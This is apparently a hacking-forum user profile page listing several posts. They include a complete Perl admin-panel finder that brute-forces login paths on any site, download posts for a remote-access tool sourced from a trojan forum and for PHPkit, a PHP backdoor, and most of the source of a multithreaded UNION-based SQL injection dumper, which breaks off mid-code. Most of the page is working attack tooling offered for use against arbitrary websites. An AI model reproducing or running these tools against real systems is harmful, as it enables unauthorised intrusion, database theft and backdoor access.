
Raptor87

About Raptor87

  • Birthday 08/08/1984

  1. Sigur frate, dă-i drumul, multumesc pentru feedback-ul
  2. #!/usr/bin/perl
##
# By Tartou2
# Admin Control Panel Finder
# Home: www.next-next-future.com
##
# NOTE(review): wordlist-driven admin-panel discovery script. It reads a host
# and a "language" from STDIN, then sends one GET per entry of a fixed path
# list and prints "Found" whenever the response BODY contains one of the
# login-related words matched below. Points a defender should know:
#  - Only $response->content is inspected; the HTTP status is never read, so
#    a custom 404/error page that mentions "password" is reported as a hit.
#  - Each branch is a burst of sequential GETs for admin-style paths against
#    one host, sent with LWP's default User-Agent (none is set here). That
#    request sequence is an easy web-log / WAF signature.
#  - The lists contain duplicates (e.g. 'admin.asp', 'admin/account.html'),
#    so some paths are requested twice.
#  - No 'use strict' / 'use warnings': $site, $code, $ways, $final and the
#    @path arrays are package globals.
use HTTP::Request;
use LWP::UserAgent;
# cmd.exe built-ins (clear screen, set window title): Windows only, they fail
# harmlessly elsewhere.
system('cls');
system('title Admin Control Panel Finder Coded by Tartou2 from www.next-next-future.com');
print"\n";
print "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\n" ;
print " Admin Control Panel Finder v 1 \n" ;
print " Coded By Tartou2\n" ;
print " website:www.next-next-future.com\n\n" ;
print "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\n" ;
print "\n";
print " Enter the website you want to scan \n";
print" e.g.: www.domaine.com or www.domaine.com/path\n";
print" --> ";
# Target host (or host/path) and the server-side language, both from STDIN.
$site=<STDIN>;
chomp $site;
print "\n\n";
print " Enter the coding language of the website \n";
print" e.g.: asp, php, cfm, any\n";
print" If you don't know the launguage used in the coding then simply type ** any ** \n";
print"--> ";
$code=<STDIN>;
chomp($code);
# NOTE(review): an https:// URL does not match /^http:/ and therefore gets
# "http://" prepended in front of it.
if ( $site !~ /^http:/ ) { $site = 'http://' . $site; }
# Ensure a trailing slash so that $site.$ways below forms a valid path.
if ( $site !~ /\/$/ ) { $site = $site . '/'; }
print "\n";
print "->The website: $site\n";
print "->Source of the website: $code\n";
print "->Scan of the admin control panel is progressing...\n\n\n";
# The four branches below are independent ifs, not elsif; each repeats the
# same request/match loop over its own wordlist.
if($code eq "asp"){
    @path1=('_admin/','backoffice/','admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
    'memberadmin/','administratorlogin/','adm/','account.asp','admin/account.asp','admin/index.asp','admin/login.asp','admin/admin.asp',
    'admin_area/admin.asp','admin_area/login.asp','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
    'admin_area/admin.html','admin_area/login.html','admin_area/index.html','admin_area/index.asp','bb-admin/index.asp','bb-admin/login.asp','bb-admin/admin.asp',
    'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','admin/controlpanel.html','admin.html','admin/cp.html','cp.html',
    'administrator/index.html','administrator/login.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html','moderator.html',
    'moderator/login.html','moderator/admin.html','account.html','controlpanel.html','admincontrol.html','admin_login.html','panel-administracion/login.html',
    'admin/home.asp','admin/controlpanel.asp','admin.asp','pages/admin/admin-login.asp','admin/admin-login.asp','admin-login.asp','admin/cp.asp','cp.asp',
    'administrator/account.asp','administrator.asp','login.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','administrator/login.asp',
    'moderator/admin.asp','controlpanel.asp','admin/account.html','adminpanel.html','webadmin.html','pages/admin/admin-login.html','admin/admin-login.html',
    'webadmin/index.html','webadmin/admin.html','webadmin/login.html','user.asp','user.html','admincp/index.asp','admincp/login.asp','admincp/index.html',
    'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','adminarea/index.html','adminarea/admin.html','adminarea/login.html',
    'panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admin/admin_login.html',
    'admincontrol/login.html','adm/index.html','adm.html','admincontrol.asp','admin/account.asp','adminpanel.asp','webadmin.asp','webadmin/index.asp',
    'webadmin/admin.asp','webadmin/login.asp','admin/admin_login.asp','admin_login.asp','panel-administracion/login.asp','adminLogin.asp',
    'admin/adminLogin.asp','home.asp','admin.asp','adminarea/index.asp','adminarea/admin.asp','adminarea/login.asp','admin-login.html',
    'panel-administracion/index.asp','panel-administracion/admin.asp','modelsearch/index.asp','modelsearch/admin.asp','administrator/index.asp',
    'admincontrol/login.asp','adm/admloginuser.asp','admloginuser.asp','admin2.asp','admin2/login.asp','admin2/index.asp','adm/index.asp',
    'adm.asp','affiliate.asp','adm_auth.asp','memberadmin.asp','administratorlogin.asp','siteadmin/login.asp','siteadmin/index.asp','siteadmin/login.html'
    );
    # One fresh UserAgent per path, 30 s timeout, plain GET; the result is
    # judged purely on body keywords (status code ignored).
    foreach $ways(@path1){
        $final=$site.$ways;
        my $req=HTTP::Request->new(GET=>$final);
        my $ua=LWP::UserAgent->new();
        $ua->timeout(30);
        my $response=$ua->request($req);
        # Broad, case-variant keyword list (English/Portuguese/Spanish/French);
        # /Sing/ and /Personal/ also match many non-login pages, so expect
        # false positives.
        if($response->content =~ /Username/ || $response->content =~ /Password/ || $response->content =~ /username/ || $response->content =~ /password/ || $response->content =~ /USERNAME/ || $response->content =~ /PASSWORD/ || $response->content =~ /Senha/ || $response->content =~ /senha/ || $response->content =~ /Personal/ || $response->content =~ /Usuario/ || $response->content =~ /Clave/ || $response->content =~ /Usager/ || $response->content =~ /usager/ || $response->content =~ /Sing/ || $response->content =~ /passe/ || $response->content =~ /P\/W/ || $response->content =~ /Admin Password/ ){
            print " \n [+] Found -> $final\n\n";
            print " \n Congratulation, this admin login page is working. \n\n Good luck from Tartou2 \n\n";
        }else{
            print "[-] Not Found <- $final\n";
        }
    }
}
# -------------------------------------------------------
# -------------------test cfm ---------------------------|
# -------------------------------------------------------
# Same list as the asp branch with .asp replaced by .cfm; @path1 is reused.
if($code eq "cfm"){
    @path1=('_admin/','backoffice/','admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
    'memberadmin/','administratorlogin/','adm/','account.cfm','admin/account.cfm','admin/index.cfm','admin/login.cfm','admin/admin.cfm',
    'admin_area/admin.cfm','admin_area/login.cfm','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
    'admin_area/admin.html','admin_area/login.html','admin_area/index.html','admin_area/index.cfm','bb-admin/index.cfm','bb-admin/login.cfm','bb-admin/admin.cfm',
    'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','admin/controlpanel.html','admin.html','admin/cp.html','cp.html',
    'administrator/index.html','administrator/login.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html','moderator.html',
    'moderator/login.html','moderator/admin.html','account.html','controlpanel.html','admincontrol.html','admin_login.html','panel-administracion/login.html',
    'admin/home.cfm','admin/controlpanel.cfm','admin.cfm','pages/admin/admin-login.cfm','admin/admin-login.cfm','admin-login.cfm','admin/cp.cfm','cp.cfm',
    'administrator/account.cfm','administrator.cfm','login.cfm','modelsearch/login.cfm','moderator.cfm','moderator/login.cfm','administrator/login.cfm',
    'moderator/admin.cfm','controlpanel.cfm','admin/account.html','adminpanel.html','webadmin.html','pages/admin/admin-login.html','admin/admin-login.html',
    'webadmin/index.html','webadmin/admin.html','webadmin/login.html','user.cfm','user.html','admincp/index.cfm','admincp/login.cfm','admincp/index.html',
    'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','adminarea/index.html','adminarea/admin.html','adminarea/login.html',
    'panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admin/admin_login.html',
    'admincontrol/login.html','adm/index.html','adm.html','admincontrol.cfm','admin/account.cfm','adminpanel.cfm','webadmin.cfm','webadmin/index.cfm',
    'webadmin/admin.cfm','webadmin/login.cfm','admin/admin_login.cfm','admin_login.cfm','panel-administracion/login.cfm','adminLogin.cfm',
    'admin/adminLogin.cfm','home.cfm','admin.cfm','adminarea/index.cfm','adminarea/admin.cfm','adminarea/login.cfm','admin-login.html',
    'panel-administracion/index.cfm','panel-administracion/admin.cfm','modelsearch/index.cfm','modelsearch/admin.cfm','administrator/index.cfm',
    'admincontrol/login.cfm','adm/admloginuser.cfm','admloginuser.cfm','admin2.cfm','admin2/login.cfm','admin2/index.cfm','adm/index.cfm',
    'adm.cfm','affiliate.cfm','adm_auth.cfm','memberadmin.cfm','administratorlogin.cfm','siteadmin/login.cfm','siteadmin/index.cfm','siteadmin/login.html'
    );
    # Identical request/match loop to the asp branch.
    foreach $ways(@path1){
        $final=$site.$ways;
        my $req=HTTP::Request->new(GET=>$final);
        my $ua=LWP::UserAgent->new();
        $ua->timeout(30);
        my $response=$ua->request($req);
        if($response->content =~ /Username/ || $response->content =~ /Password/ || $response->content =~ /username/ || $response->content =~ /password/ || $response->content =~ /USERNAME/ || $response->content =~ /PASSWORD/ || $response->content =~ /Senha/ || $response->content =~ /senha/ || $response->content =~ /Personal/ || $response->content =~ /Usuario/ || $response->content =~ /Clave/ || $response->content =~ /Usager/ || $response->content =~ /usager/ || $response->content =~ /Sing/ || $response->content =~ /passe/ || $response->content =~ /P\/W/ || $response->content =~ /Admin Password/ ){
            print " \n [+] Found -> $final\n\n";
            print " \n Congratulation, this admin login page is working. \n\n Good luck from Tartou2 \n\n";
        }else{
            print "[-] Not Found <- $final\n";
        }
    }
}
# -------------------------------------------------------
#--------------------------/test-------------------------|
# -------------------------------------------------------
# php branch uses @path2. Note it still carries 'admincp/index.asp' and
# 'admincp/login.asp', and 'wp-login.php' / 'nsw/admin/login.php' /
# 'rcjakar/admin/login.php' that are absent from the asp/cfm lists.
if($code eq "php"){
    @path2=('_admin/','backoffice/','admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
    'memberadmin/','administratorlogin/','adm/','admin/account.php','admin/index.php','admin/login.php','admin/admin.php','admin/account.php',
    'admin_area/admin.php','admin_area/login.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
    'admin_area/index.php','bb-admin/index.php','bb-admin/login.php','bb-admin/admin.php','admin/home.php','admin_area/login.html','admin_area/index.html',
    'admin/controlpanel.php','admin.php','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',
    'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html',
    'admin/cp.php','cp.php','administrator/index.php','administrator/login.php','nsw/admin/login.php','webadmin/login.php','admin/admin_login.php','admin_login.php',
    'administrator/account.php','administrator.php','admin_area/admin.html','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php',
    'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.php','modelsearch/login.php','moderator.php','moderator/login.php',
    'moderator/admin.php','account.php','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.php','admincontrol.php',
    'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.php','adminarea/index.html','adminarea/admin.html',
    'webadmin.php','webadmin/index.php','webadmin/admin.php','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.php','moderator.html',
    'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html',
    'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html',
    'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.php','account.html','controlpanel.html','admincontrol.html',
    'panel-administracion/login.php','wp-login.php','adminLogin.php','admin/adminLogin.php','home.php','admin.php','adminarea/index.php',
    'adminarea/admin.php','adminarea/login.php','panel-administracion/index.php','panel-administracion/admin.php','modelsearch/index.php',
    'modelsearch/admin.php','admincontrol/login.php','adm/admloginuser.php','admloginuser.php','admin2.php','admin2/login.php','admin2/index.php',
    'adm/index.php','adm.php','affiliate.php','adm_auth.php','memberadmin.php','administratorlogin.php'
    );
    # Identical request/match loop to the asp branch.
    foreach $ways(@path2){
        $final=$site.$ways;
        my $req=HTTP::Request->new(GET=>$final);
        my $ua=LWP::UserAgent->new();
        $ua->timeout(30);
        my $response=$ua->request($req);
        if($response->content =~ /Username/ || $response->content =~ /Password/ || $response->content =~ /username/ || $response->content =~ /password/ || $response->content =~ /USERNAME/ || $response->content =~ /PASSWORD/ || $response->content =~ /Senha/ || $response->content =~ /senha/ || $response->content =~ /Personal/ || $response->content =~ /Usuario/ || $response->content =~ /Clave/ || $response->content =~ /Usager/ || $response->content =~ /usager/ || $response->content =~ /Sing/ || $response->content =~ /passe/ || $response->content =~ /P\/W/ || $response->content =~ /Admin Password/ ){
            print " \n [+] Found -> $final\n\n";
            print " \n Congratulation, this admin login page is working. \n\n Good luck from Tartou2 \n\n";
        }else{
            print "[-] Not Found <- $final\n";
        }
    }
}
# -------------------------------------------------------
# ----------------------- any ---------------------------|
# -------------------------------------------------------
# "any" = the union of the three lists plus a large set of extension-less
# directory names (product admin consoles, cPanel, phpMyAdmin, typo3, wp-*,
# Turkish 'yonetici'/'yonetim', ...). One entry, 'panel/?a=cp', carries a
# query string.
if($code eq "any"){
    @path1=('_admin/','backoffice/','account.asp','account.cfm','account.html','account.php','acct_login/','adm.asp','adm.cfm','adm.html','adm.php','adm/','adm/admloginuser.asp','adm/admloginuser.cfm','adm/admloginuser.php','adm/index.asp','adm/index.cfm','adm/index.html','adm/index.php','adm_auth.asp','adm_auth.cfm','adm_auth.php',
    'admin.asp','admin.cfm','admin.html','admin.php','admin/','admin/account.asp','admin/account.cfm','admin/account.html','admin/account.php','admin/admin.asp','admin/admin.cfm','admin/admin.html','admin/admin.php','admin/admin_login.asp','admin/admin_login.cfm','admin/admin_login.html','admin/admin_login.php',
    'admin/adminLogin.asp','admin/admin-login.asp','admin/adminLogin.cfm','admin/admin-login.cfm','admin/adminLogin.html','admin/admin-login.html','admin/adminLogin.php','admin/admin-login.php','admin/controlpanel.asp','admin/controlpanel.cfm','admin/controlpanel.html','admin/controlpanel.php',
    'admin/cp.asp','admin/cp.cfm','admin/cp.html','admin/cp.php','admin/home.asp','admin/home.cfm','admin/home.html','admin/home.php','admin/index.asp','admin/index.cfm','admin/index.html','admin/index.php','admin/login.asp','admin/login.cfm','admin/login.html','admin/login.php',
    'admin_area/','admin_area/admin.asp','admin_area/admin.cfm','admin_area/admin.html','admin_area/admin.php','admin_area/index.asp','admin_area/index.cfm','admin_area/index.html','admin_area/index.php','admin_area/login.asp','admin_area/login.cfm','admin_area/login.html','admin_area/login.php',
    'admin_login.asp','admin_login.cfm','admin_login.html','admin_login.php',
    'admin1.asp','admin1.html','admin1.php','admin1/','admin2.asp','admin2.cfm','admin2.html','admin2.php','admin2/index.asp','admin2/index.cfm','admin2/index.php','admin2/login.asp','admin2/login.cfm','admin2/login.php','admin4_account/','admin4_colon/',
    'adminarea/','adminarea/admin.asp','adminarea/admin.cfm','adminarea/admin.html','adminarea/admin.php','adminarea/index.asp','adminarea/index.cfm','adminarea/index.html','adminarea/index.php','adminarea/login.asp','adminarea/login.cfm','adminarea/login.html','adminarea/login.php',
    'admincontrol.asp','admincontrol.cfm','admincontrol.html','admincontrol.php','admincontrol/login.asp','admincontrol/login.cfm','admincontrol/login.html','admincontrol/login.php','admincp/index.asp','admincp/index.cfm','admincp/index.html','admincp/login.asp','admincp/login.cfm',
    'administer/','administr8.asp','administr8.html','administr8.php','administr8/','administratie/','administration.html','administration.php','administration/',
    'administrator.asp','administrator.cfm','administrator.html','administrator.php','administrator/','administrator/account.asp','administrator/account.cfm','administrator/account.html','administrator/account.php','administrator/index.asp','administrator/index.cfm','administrator/index.html','administrator/index.php','administrator/login.asp','administrator/login.cfm','administrator/login.html','administrator/login.php',
    'administratoraccounts/','administratorlogin.asp','administratorlogin.cfm','administratorlogin.php','administratorlogin/','administrators/','administrivia/',
    'adminLogin.asp','admin-login.asp','adminLogin.cfm','admin-login.cfm','adminLogin.html','admin-login.html','adminLogin.php','admin-login.php','adminLogin/',
    'adminpanel.asp','adminpanel.cfm','adminpanel.html','adminpanel.php','adminpro/','admins.asp','admins.html','admins.php','admins/','AdminTools/','admloginuser.asp','admloginuser.cfm','admloginuser.php','affiliate.asp','affiliate.cfm','affiliate.php','autologin/','banneradmin/','bbadmin/',
    'bb-admin/','bb-admin/admin.asp','bb-admin/admin.cfm','bb-admin/admin.html','bb-admin/admin.php','bb-admin/index.asp','bb-admin/index.cfm','bb-admin/index.html','bb-admin/index.php','bb-admin/login.asp','bb-admin/login.cfm','bb-admin/login.html','bb-admin/login.php',
    'bigadmin/','blogindex/','cadmins/','ccp14admin/','cmsadmin/','controlpanel.asp','controlpanel.cfm','controlpanel.html','controlpanel.php','controlpanel/','cp.asp','cp.cfm','cp.html','cp.php','cPanel/','cpanel_file/','customer_login/','database_administration/','directadmin/','dir-login/','ezsqliteadmin/',
    'fileadmin.asp','fileadmin.html','fileadmin.php','fileadmin/','formslogin/','globes_admin/','home.asp','home.cfm','home.html','home.php','hpwebjetadmin/','Indy_admin/','instadmin/','irc-macadmin/','LiveUser_Admin/',
    'login.asp','login.cfm','login.html','login.php','login_db/','login1/','loginflat/','login-redirect/','login-us/','logo_sysadmin/','Lotus_Domino_Admin/','macadmin/','manuallogin/','memberadmin.asp','memberadmin.cfm','memberadmin.php','memberadmin/','members/','memlogin/','meta_login/',
    'modelsearch/admin.asp','modelsearch/admin.cfm','modelsearch/admin.html','modelsearch/admin.php','modelsearch/index.asp','modelsearch/index.cfm','modelsearch/index.html','modelsearch/index.php','modelsearch/login.asp','modelsearch/login.cfm','modelsearch/login.html','modelsearch/login.php',
    'moderator.asp','moderator.cfm','moderator.html','moderator.php','moderator/','moderator/admin.asp','moderator/admin.cfm','moderator/admin.html','moderator/admin.php','moderator/login.asp','moderator/login.cfm','moderator/login.html','moderator/login.php',
    'myadmin/','navSiteAdmin/','newsadmin/','nsw/admin/login.php','openvpnadmin/','pages/admin/admin-login.asp','pages/admin/admin-login.cfm','pages/admin/admin-login.html','pages/admin/admin-login.php','panel/',
    'panel-administracion/','panel-administracion/admin.asp','panel-administracion/admin.cfm','panel-administracion/admin.html','panel-administracion/admin.php','panel-administracion/index.asp','panel-administracion/index.cfm','panel-administracion/index.html','panel-administracion/index.php','panel-administracion/login.asp','panel-administracion/login.cfm','panel-administracion/login.html','panel-administracion/login.php',
    'pgadmin/','phpldapadmin/','phpmyadmin/','phppgadmin/','phpSQLiteAdmin/','platz_login/','power_user/','project-admins/','pureadmin/','radmind/','radmind-1/','rcjakar/admin/login.php','rcLogin/',
    'Server.asp','Server.html','Server.php','server/','server_admin_small/','ServerAdministrator/','showlogin/','simpleLogin/','siteadmin/index.asp','siteadmin/index.cfm','siteadmin/index.php','siteadmin/login.asp','siteadmin/login.cfm','siteadmin/login.html','siteadmin/login.php',
    'smblogin/','sql-admin/','ss_vms_admin_sm/','sshadmin/','staradmin/','sub-login/','Super-Admin/','support_login/','sysadmin.asp','sysadmin.html','sysadmin.php','sysadmin/','sys-admin/','SysAdmin2/','sysadmins/','system_administration/','system-administration/','typo3/',
    'ur-admin.asp','ur-admin.html','ur-admin.php','ur-admin/','user.asp','user.html','user.php','useradmin/','UserLogin/','utility_login/','vadmind/','vmailadmin/',
    'webadmin.asp','webadmin.cfm','webadmin.html','webadmin.php','WebAdmin/','webadmin/admin.asp','webadmin/admin.cfm','webadmin/admin.html','webadmin/admin.php','webadmin/index.asp','webadmin/index.cfm','webadmin/index.html','webadmin/index.php','webadmin/login.asp','webadmin/login.cfm','webadmin/login.html','webadmin/login.php',
    'wizmysqladmin/','wp-admin/','wp-login.php','wp-login/','xlogin/','yonetici.asp','yonetici.html','yonetici.php','yonetim.asp','yonetim.html','yonetim.php','panel/?a=cp'
    );
    # Identical request/match loop to the asp branch.
    foreach $ways(@path1){
        $final=$site.$ways;
        my $req=HTTP::Request->new(GET=>$final);
        my $ua=LWP::UserAgent->new();
        $ua->timeout(30);
        my $response=$ua->request($req);
        if($response->content =~ /Username/ || $response->content =~ /Password/ || $response->content =~ /username/ || $response->content =~ /password/ || $response->content =~ /USERNAME/ || $response->content =~ /PASSWORD/ || $response->content =~ /Senha/ || $response->content =~ /senha/ || $response->content =~ /Personal/ || $response->content =~ /Usuario/ || $response->content =~ /Clave/ || $response->content =~ /Usager/ || $response->content =~ /usager/ || $response->content =~ /Sing/ || $response->content =~ /passe/ || $response->content =~ /P\/W/ || $response->content =~ /Admin Password/ ){
            print " \n [+] Found -> $final\n\n";
            print " \n Congratulation, this admin login page is working. \n\n Good luck from Tartou2 \n\n";
        }else{
            print "[-] Not Found <- $final\n";
        }
    }
    # NOTE(review): NULL is a bareword (no strict) that numifies to 0, so this
    # is kill 'STOP', 0. On POSIX a pid of 0 addresses the caller's own
    # process group, so this presumably suspends the script itself once the
    # "any" branch finishes; the other branches have no such line. Confirm
    # on the platform it is run on.
    kill("STOP",NULL);
}
## Source www.next-next-future.com
  3. Brynhildr is a handy and reliable software that helps you to easily connect to a computer by specifying the IP address and the port number. The aforementioned application provides you with both server and client tools and allows you to remotely connect to any PC in just a few seconds. It handles clipboard forwarding and voice transmission. Download: http://blog.x-row.net/download/brynhildr.php?file=0997 Source: http://trojanforge.com Credit: rnk
  4. Hook Analyser is a hooking tool that can be helpful in reversing applications and analysing malware. It can hook an API in a process and search for a pattern in memory or dump the buffer. Changes: the UI and modules of the project have been rewritten; the interactive mode is now more verbose; the (static) malware analysis module has been enhanced; bug fixes and other improvements. Download: Hook Analyser Malware Tool 2.2 ≈ Packet Storm. Source and new version download: Hook Analyser
  5. PHPkit is a simple PHP-based backdoor, leveraging include() and php://input to allow the attacker to execute arbitrary PHP code on the infected server. The actual backdoor contains no suspicious calls such as eval() or system(), as the PHP code is executed in memory by include(). Systems | unix. Download: PHP Kit 1.0 ≈ Packet Storm. Source: PHP Kit 1.0 ≈ Packet Storm
  6. This is a SQL injection tool similar to havij but is super fast per the author. Authored by:miyachung Systems | unix <?php /************************************************************************* . __ .__ _____ |__|___.__._____ ____ | |__ __ __ ____ ____ / \| < | |\__ \ _/ ___\| | \| | \/ \ / ___\ | Y Y \ |\___ | / __ \\ \___| Y \ | / | \/ /_/ > |__|_| /__|/ ____|(____ /\___ >___| /____/|___| /\___ / \/ \/ \/ \/ \/ \//_____/ -------------------------------------------------------------------------- * Multithreaded SQL Injector * Coded by Miyachung * Miyachung@hotmail.com * Special Thanks burtay * Janissaries.Org * Youtube Channel -> http://www.youtube.com/JanissariesOrg * Usage -> https://www.youtube.com/watch?v=pytxxNnDWEU * Dump show -> https://www.youtube.com/watch?v=TvCvtgKn6Rg ***************************************************************************/ set_time_limit(0); if(!is_dir("dumps")){mkdir("dumps");} echo "[+]Enter website: "; $site = fgets(STDIN); $site = str_replace("\r\n","",$site); $site = trim($site); if(!$site) exit("\n[-]Where is the website!"); if(!preg_match('#http#',$site)) $site = "http://".$site; echo "[+]Enter column number: "; $colons = fgets(STDIN); $colons = str_replace("\r\n","",$colons); $colons = trim($colons); if(!$colons) exit("\n[-]Where is the columns!"); echo "[+]Enter effected column: "; $effected = fgets(STDIN); $effected = str_replace("\r\n","",$effected); $effected = trim($effected); if(!$effected) exit("\n[-]Where is the effected column!"); echo "[+]Advanced SQL Injecter\n"; echo "[+]Coded by Miyachung || Janissaries.Org\n"; $version_url = __make_SQL_URL($site,$colons, $effected,FALSE,TRUE,"",__hexEncode("<v3rsion>"),__hexEncode("</v3rsion>"),"version ()"); $version_page = fetch($version_url); if(preg_match("#Illegal mix of collations for operation 'UNION'#si",$version_page)) { exit("[-]Fail -> Illegal mix of collations for operation 'UNION'\n"); } elseif(preg_match("#403 Forbidden#si",$version_page)) { exit("[-]Fail 
-> 403 Forbidden\n"); } $version_page = __replace($version_page); if(preg_match('#<v3rsion>#si',$version_page)) { preg_match("/<v3rsion>(.*?)<\/v3rsion>/si",$version_page,$version); echo "[+]Version -> ".strip_tags($version[1])."\n"; } else { exit("[-]Version not found\n"); } $database_url = __make_SQL_URL($site,$colons, $effected,FALSE,TRUE,"",__hexEncode("<d4tabase>"),__hexEncode("</d4tabase>"),"database ()"); $database_page = fetch($database_url); if(preg_match("#Illegal mix of collations for operation 'UNION'#si",$database_page)) { exit("[-]Fail -> Illegal mix of collations for operation 'UNION'\n"); } elseif(preg_match("#403 Forbidden#si",$database_page)) { exit("[-]Fail -> 403 Forbidden\n"); } $database_page = __replace($database_page); if(preg_match('#<d4tabase>#si',$database_page)) { preg_match("/<d4tabase>(.*?)<\/d4tabase>/si",$database_page,$database); echo "[+]Database -> ".strip_tags($database[1])."\n"; } else { echo "[-]Database not found\n"; } if(substr($version[1],0,1) == 5) { echo "[+]Version >= 5 getting tables,using information_schema.tables\n"; }else{exit("[-]Version < 5 , sorry can't get the tables");} $table_counturl = __make_SQL_URL($site,$colons,$effected,"+from +information_schema.tables+where+table_schema=database()",TRUE,"",__hexEncode ("<t4blecount>"),__hexEncode("</t4blecount>"),"count(table_name)"); $table_countpage = fetch($table_counturl); $table_countpage = __replace($table_countpage); preg_match("/<t4blecount>(.*?)<\/t4blecount>/si",$table_countpage,$table_counted); if($table_counted[1] == null) { exit("[-]Tables not found\n"); } echo "[+]Total tables -> ".$table_counted[1]."\n"; for($xz=0;$xz<$table_counted[1];$xz++) { $table_url[] = __make_SQL_URL($site,$colons,$effected,"+from +information_schema.tables+where+table_schema=database()",TRUE,$xz,__hexEncode ("<t4bles>"),__hexEncode("</t4bles>"),"table_name"); // $table_page = fetch($table_url); // if(preg_match("#Illegal mix of collations for operation 'UNION'#si",$table_page)) // { 
// exit("[-]Fail -> Illegal mix of collations for operation 'UNION'\n"); // } // elseif(preg_match("#403 Forbidden#si",$table_page)) // { // exit("[-]Fail -> 403 Forbidden\n"); // } // $table_page = __replace($table_page); // preg_match("/<t4bles>(.*?)<\/t4bles>/si",$table_page,$tables); // $tbls[] = strip_tags(trim($tables[1])); } $tbls = __threading($table_url,10,"/<t4bles>(.*?)<\/t4bles>/si",FALSE,FALSE); table_again: echo "\n"; $tbls = array_values(array_unique(array_filter($tbls))); if(empty($tbls)) { exit("[-]Can't get tables\n"); } foreach($tbls as $tid => $tbl) { echo "[$tid]$tbl\n"; } echo "\n[+]Choose a table for get columns,just type number (exit): "; $choose = fgets(STDIN); $choose = str_replace("\r\n","",$choose); $choose = trim($choose); if($choose == "exit") { exit("\n"); } $selected = $tbls[$choose]; $column_counturl = __make_SQL_URL($site,$colons,$effected,"+from +information_schema.columns+where+table_name=0x".__hexEncode ($selected)."",TRUE,"",__hexEncode("<c0lumnscount>"),__hexEncode("</ c0lumnscount>"),"count(column_name)"); $column_countpage = fetch($column_counturl); $column_countpage = __replace($column_countpage); preg_match("/<c0lumnscount>(.*?)<\/c0lumnscount>/si",$column_countpage, $column_counted); if($column_counted[1] == null || $column_counted[1] == 0) { echo "[-]Columns not found\n"; goto table_again; } echo "[+]Total columns for $selected -> ".$column_counted[1]."\n"; for($xc=0;$xc<$column_counted[1];$xc++) { $column_url[] = __make_SQL_URL($site,$colons,$effected,"+from +information_schema.columns+where+table_name=0x".__hexEncode($selected)."",TRUE, $xc,__hexEncode("<c0lumns>"),__hexEncode("</c0lumns>"),"column_name"); // $column_page = fetch($column_url); // if(preg_match("#Illegal mix of collations for operation 'UNION'#si",$column_page)) // { // exit("[-]Fail -> Illegal mix of collations for operation 'UNION'\n"); // } // elseif(preg_match("#403 Forbidden#si",$column_page)) // { // exit("[-]Fail -> 403 Forbidden\n"); // } // 
$column_page = __replace($column_page); // preg_match("/<c0lumns>(.*?)<\/c0lumns>/si",$column_page,$columns); // $cols[] = strip_tags(trim($columns[1])); } $cols = __threading($column_url,5,"/<c0lumns>(.*?)<\/c0lumns>/si",FALSE,FALSE); col_showagain: echo "\n"; $cols = array_values(array_unique(array_filter($cols))); foreach($cols as $cid => $colname) { echo "[$cid]$colname\n"; } what_again: echo "\n[+]What do you wanna do (dump,back,exit): "; $whatdo = fgets(STDIN); $whatdo = str_replace("\r\n","",$whatdo); $whatdo = trim($whatdo); if($whatdo == "dump") { col_ask: echo "[+]Select dump column 1,just type number(back,exit): "; $select_col1 = fgets(STDIN); $select_col1 = str_replace("\r\n","",$select_col1); $select_col1 = trim($select_col1); if($select_col1 == "back") { goto col_showagain; } elseif($select_col1 == "exit") { exit("\n"); } echo "[+]Select dump column 2,type number(if you don't want just enter,back,exit): "; $select_col2 = fgets(STDIN); $select_col2 = str_replace("\r\n","",$select_col2); $select_col2 = trim($select_col2); if($select_col2 == "back") { goto col_ask; } elseif($select_col2 == "exit") { exit("\n"); } elseif(!empty($select_col2)) { $column2 = $cols[$select_col2]; } $column1 = $cols[$select_col1]; $count_url = __make_SQL_URL($site,$colons,$effected,"+from+ $selected",TRUE,"",__hexEncode("<miyacount>"),__hexEncode("</miyacount>"),"count ($column1)"); $count_page = fetch($count_url); $count_page = __replace($count_page); preg_match("/<miyacount>(.*?)<\/miyacount>/si",$count_page,$datacount); if(trim($datacount[1]) == null || $datacount[1] == 0) { echo "[-]Columns empty\n"; goto col_showagain; } echo "[+]Total datas -> ".$datacount[1]."\n"; echo "[+]Using LIMIT NULL,1 for dump\n\n"; for($x=0;$x<=$datacount[1];$x++) { if($column2) { $dump_url[] = __make_SQL_URL($site,$colons,$effected,"+from+$selected",TRUE, 